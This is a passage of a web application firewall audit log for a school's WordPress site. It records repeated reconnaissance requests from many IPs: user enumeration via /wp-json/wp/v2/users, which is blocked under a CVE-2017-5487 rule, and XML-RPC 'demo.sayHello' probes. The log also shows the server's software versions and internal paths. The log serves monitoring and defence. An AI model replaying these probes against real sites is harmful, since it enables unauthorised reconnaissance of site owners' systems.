REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747508214482581 2995 (- - -) Stopwatch2: 1747508214482581 2995; combined=1688, p1=493, p2=1159, p3=0, p4=0, p5=36, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f659775-Z-- --693c6861-A-- [18/May/2025:01:57:01 +0700] aCjb_QTOsBn9MSWb6WLw7QAAAIc 103.236.140.4 40234 103.236.140.4 8181 --693c6861-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.228 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --693c6861-C-- demo.sayHello --693c6861-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --693c6861-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747508221023960 10322 (- - -) Stopwatch2: 1747508221023960 10322; combined=8048, p1=1070, p2=6698, p3=47, p4=64, p5=100, sr=101, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --693c6861-Z-- --2fe52741-A-- [18/May/2025:02:31:09 +0700] aCjj_QTOsBn9MSWb6WIubwAAAIU 103.236.140.4 58910 103.236.140.4 8181 --2fe52741-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2fe52741-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fe52741-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747510269382885 3222 (- - -) Stopwatch2: 1747510269382885 3222; combined=1769, p1=570, p2=1168, p3=0, p4=0, p5=31, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fe52741-Z-- --8cd4143f-A-- [18/May/2025:02:31:17 +0700] aCjkBRKi5m5upc8uMd6EbgAAANM 103.236.140.4 59574 103.236.140.4 8181 --8cd4143f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.64 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8cd4143f-C-- demo.sayHello --8cd4143f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cd4143f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747510277495405 4989 (- - -) Stopwatch2: 1747510277495405 4989; combined=3990, p1=528, p2=3253, p3=38, p4=40, p5=78, sr=59, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cd4143f-Z-- --4920287f-A-- [18/May/2025:04:21:27 +0700] aCj91xir-GlPrFVVKe4PGQAAAEA 103.236.140.4 53786 103.236.140.4 8181 --4920287f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.134.219.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.134.219.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4920287f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4920287f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747516887083156 3171 (- - -) Stopwatch2: 1747516887083156 3171; combined=1350, p1=453, p2=868, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4920287f-Z-- --fbaf4c13-A-- [18/May/2025:04:29:25 +0700] aCj_tRir-GlPrFVVKe4PIQAAAFg 103.236.140.4 53812 103.236.140.4 8181 --fbaf4c13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.132 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fbaf4c13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbaf4c13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747517365715603 3320 (- - -) Stopwatch2: 1747517365715603 3320; combined=1370, p1=475, p2=861, p3=0, p4=0, p5=34, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbaf4c13-Z-- --0487cd32-A-- [18/May/2025:04:29:33 +0700] aCj_vRir-GlPrFVVKe4PIgAAAFc 103.236.140.4 53822 103.236.140.4 8181 --0487cd32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.132 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0487cd32-C-- demo.sayHello --0487cd32-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0487cd32-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747517373040537 6310 (- - -) Stopwatch2: 1747517373040537 6310; combined=4687, p1=594, p2=3771, p3=35, p4=36, p5=145, sr=123, sw=106, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0487cd32-Z-- --b6098109-A-- [18/May/2025:05:00:13 +0700] aCkG7Rir-GlPrFVVKe4PTwAAAEE 103.236.140.4 54050 103.236.140.4 8181 --b6098109-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b6098109-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6098109-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747519213465817 3258 (- - -) Stopwatch2: 1747519213465817 3258; combined=1439, p1=504, p2=903, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6098109-Z-- --1289272c-A-- [18/May/2025:05:00:19 +0700] aCkG80PRqak7bVuUS6fYaQAAAI4 103.236.140.4 54056 103.236.140.4 8181 --1289272c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1289272c-C-- demo.sayHello --1289272c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1289272c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747519219567247 7427 (- - -) Stopwatch2: 1747519219567247 7427; combined=5231, p1=723, p2=4236, p3=42, p4=43, p5=109, sr=135, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1289272c-Z-- --613b6769-A-- [18/May/2025:06:40:56 +0700] aCkeiFewLfDrCkDGIGwxrAAAAM8 103.236.140.4 54656 103.236.140.4 8181 --613b6769-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --613b6769-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --613b6769-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747525256257614 3120 (- - -) Stopwatch2: 1747525256257614 3120; combined=1400, p1=465, p2=904, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --613b6769-Z-- --eab89b2c-A-- [18/May/2025:06:41:05 +0700] aCkekUPRqak7bVuUS6ffFgAAAJY 103.236.140.4 55024 103.236.140.4 8181 --eab89b2c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.123 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --eab89b2c-C-- demo.sayHello --eab89b2c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --eab89b2c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747525265324913 5689 (- - -) Stopwatch2: 1747525265324913 5689; combined=4189, p1=574, p2=3353, p3=36, p4=39, p5=133, sr=62, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eab89b2c-Z-- --a204aa0c-A-- [18/May/2025:07:00:37 +0700] aCkjJUPRqak7bVuUS6fq-wAAAII 103.236.140.4 46296 103.236.140.4 8181 --a204aa0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a204aa0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a204aa0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747526437372381 3431 (- - -) Stopwatch2: 1747526437372381 3431; combined=2075, p1=571, p2=1469, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a204aa0c-Z-- --93b8e70c-A-- [18/May/2025:07:00:42 +0700] aCkjKlewLfDrCkDGIGw9AgAAAM8 103.236.140.4 46536 103.236.140.4 8181 --93b8e70c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --93b8e70c-C-- demo.sayHello --93b8e70c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --93b8e70c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747526442894973 8797 (- - -) Stopwatch2: 1747526442894973 8797; combined=6768, p1=906, p2=5556, p3=53, p4=74, p5=106, sr=73, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93b8e70c-Z-- --7a1ffa24-A-- [18/May/2025:07:04:00 +0700] aCkj8Bir-GlPrFVVKe4i8wAAAEw 103.236.140.4 54688 103.236.140.4 8181 --7a1ffa24-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7a1ffa24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a1ffa24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747526640021315 2304 (- - -) Stopwatch2: 1747526640021315 2304; combined=890, p1=303, p2=565, p3=0, p4=0, p5=22, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a1ffa24-Z-- --0f33f673-A-- [18/May/2025:07:04:08 +0700] aCkj-Bir-GlPrFVVKe4jFgAAAEU 103.236.140.4 55064 103.236.140.4 8181 --0f33f673-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.202 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0f33f673-C-- demo.sayHello --0f33f673-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f33f673-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747526648854557 5441 (- - -) Stopwatch2: 1747526648854557 5441; combined=3843, p1=527, p2=3106, p3=31, p4=32, p5=86, sr=105, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f33f673-Z-- --2d54ae3f-A-- [18/May/2025:07:16:46 +0700] aCkm7vypzAd0elWOk7odfQAAAAA 103.236.140.4 54478 103.236.140.4 8181 --2d54ae3f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 52.66.42.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.66.42.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2d54ae3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d54ae3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747527406675957 2582 (- - -) Stopwatch2: 1747527406675957 2582; combined=1155, p1=397, p2=734, p3=0, p4=0, p5=24, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d54ae3f-Z-- --7be03044-A-- [18/May/2025:07:17:20 +0700] aCknEEPRqak7bVuUS6fzfAAAAIA 103.236.140.4 55864 103.236.140.4 8181 --7be03044-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7be03044-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7be03044-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747527440959485 2497 (- - -) Stopwatch2: 1747527440959485 2497; combined=995, p1=341, p2=629, p3=0, p4=0, p5=25, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7be03044-Z-- --c09ff120-A-- [18/May/2025:07:17:31 +0700] aCknGhir-GlPrFVVKe4qJAAAAEU 103.236.140.4 56104 103.236.140.4 8181 --c09ff120-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.94 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c09ff120-C-- 